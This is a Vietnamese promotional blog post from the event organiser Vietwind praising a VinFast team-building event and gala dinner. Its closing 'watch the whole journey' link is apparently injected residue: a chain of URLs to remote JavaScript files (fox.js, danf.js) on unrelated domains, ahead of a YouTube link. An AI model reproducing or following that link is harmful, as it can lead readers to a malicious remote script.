Team building VinFast – Gắn kết để bứt phá mọi giới hạn

“Gắn kết để bứt phá mọi giới hạn” là những gì mà 2000 thành viên được trải nghiệm trong chuỗi chương trình Team Building VinFast với chủ đề ” No Limit “. Mang trong mình nguồn năng lượng tích cực cùng tinh thần teamwork ngày càng ” lên đỉnh ” sau mỗi thử thách, các thành viên đại gia đình Vinfast đã ghi dấu một hành trình gắn kết đầy đáng nhớ cùng sự đồng hành của Vietwind.

tổ-chức-team-building-vinfast-vietwind-1

1.Team Building Vinfast – No Limit

Sự kiện Team Building VinFast diễn ra trong 3 ngày từ 23 – 25/08 vừa qua được coi là phát súng mở đầu cho chuỗi sự kiện được mong chờ nhất trong năm của đại gia đình Vinfast với quy mô khủng. Đó là sự quy tụ của  hơn 2000 thành viên công ty tại 3 địa điểm cực: Hạ Long-Đà Nẵng-Nha Trang.

tổ-chức-team-building-vinfast-vietwind-6Đứng sau thành công của Team Building VinFast là những nhân viên nhiệt huyết của Vietwind 

tổ-chức-team-building-vinfast-vietwind-2

Là một công ty khởi nghiệp trong lĩnh vực ô tô – xe máy với sự hậu thuẫn của Vingroup – doanh nghiệp tư nhân lớn nhất Việt Nam, nhưng không vì thế mà VinFast ỷ lại vào nền móng vững chắc như vậy. Các thành viên công ty vẫn luôn ý thức phải nỗ lực học hỏi, trau dồi kiến thức và kỹ năng để xứng đáng với tên tuổi tập đoàn.

tổ-chức-team-building-vinfast-vietwind-3

Trải qua rất nhiều thử thách tại Condotel Đà Nẵng, các đội vẫn luôn giữ vững được tinh thần làm hết sức, chơi hết mình. Và để duy trì không khí hứng khởi, sôi động xuyên suốt là sự đóng góp không nhỏ của đội ngũ điều hành giàu kinh nghiệm tổ chức Team building của Vietwind.

tổ-chức-team-building-vinfast-vietwind-5

team-building-vinfast-vietwind

team-building-vinfast-vietwind

Mỗi trò chơi là một trải nghiệm hết sức thú vị, để cán đích thì ngoài trí và lực còn đòi hỏi tinh thần đoàn kết trong Team Building. Nhưng điều đó không làm khó được các chàng trai, cô gái đến từ “kẻ không lồ” Vinfast. Những giọt mồ hôi chỉ càng giúp họ có thêm phần quyết tâm, cùng nhau dành lấy chiến thắng. Sau hành trình chung sức, đồng tâm là bài học ý nghĩa gửi gắm đến từ Vietwind về sức mạnh đoàn kết nội bộ.

team-building-vinfast-vietwind

tổ-chức-team-building-vinfast-vietwind-7Trò chơi Team building VinFast hấp dẫn

tổ-chức-team-building-vinfast-vietwind-8Team Building VinFast gắn kết 

Team building VinFast

Bứt phá vươn lên

2.Gala diner – bùng nổ cảm xúc

Sau một ngày dài xõa hết mình, tinh thần hứng khởi của cả công ty không hề thuyên giảm. Các gamehshow vẫn tiếp tục bùng nổ mang tới không khí sôi động khắp hội trường.

team-building-vinfast-vietwind

team-building-vinfast-vietwind

Và trong không gian ấm cúng, mọi người cùng trao nhau những cái bắt tay thân tình, những lời chúc tốt đẹp nhất. Những điều tưởng chừng là xa xỉ thì nay lại hiện hữu ngay tại sự kiện Team Building Vinfast mà Vietwind tổ chức.

team-building-vinfast-vietwind

Ngày hôm nay, thành quả từ những vòng tay kết nối chỉ là món quà nhỏ nhưng chắc chắn trở thành sức mạnh to lớn để họ chinh phục những chiếc cup trên thương trường. Bài học từ chương trình Team building của Vietwind cùng văn hóa đoàn kết của VinFast sẽ mãi là nguồn cảm hứng cho những công ty còn đang đi tìm động lực bứt phá cho mình.

>>Xem toàn bộ hành trình tại đây

https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.youtube.com/watch?v=E7YyRppf3I4&t=3s

Facebook Comments

Bài Viết Liên Quan